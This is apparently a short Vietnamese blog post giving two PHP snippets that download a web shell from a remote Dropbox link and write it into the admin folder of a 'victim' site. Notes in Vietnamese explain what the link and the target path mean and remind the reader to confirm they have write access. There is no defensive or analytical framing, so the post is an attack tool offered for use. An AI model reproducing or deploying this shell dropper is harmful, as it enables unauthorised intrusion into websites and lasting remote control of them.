<?php
touch(xxx.php);
chmod("xxx.php", 0755);
$fin=fopen("http://dl.dropbox.com/u/10860051/shell/PHP/xxx.txt",r)or exit("false 1");
$fout=fopen("/home/victim/domains/victim.com/public_html/admin/xxx.php",a)or exit("false 2");
while(!feof($fin))
{
fwrite($fout,fgets($fin));
}fclose($fin);
fclose($fout);
?>Hoặc:
<?php
touch(xxx.php);
chmod("xxx.php", 0755);
$fout=fopen("/home/victim/domains/victim.com/public_html/admin/xxx.php",a)or exit("false");
fwrite($fout,file_get_contents(http://dl.dropbox.com/u/10860051/shell/PHP/xxx.txt));
fclose($fout);
?>[+] http://dl.dropbox.com/u/10860051/shell/PHP/xxx.txt <--- là link shell ở 1 host nào đó,up lên nhớ
[+] /home/victim/domains/victim.com/public_html/admin/xxx.php <--- là vị trí shell đc đẩy vào host,hảy chắc chắn là ta có quyền ghi file ở đó nhé !
0 nhận xét:
Đăng nhận xét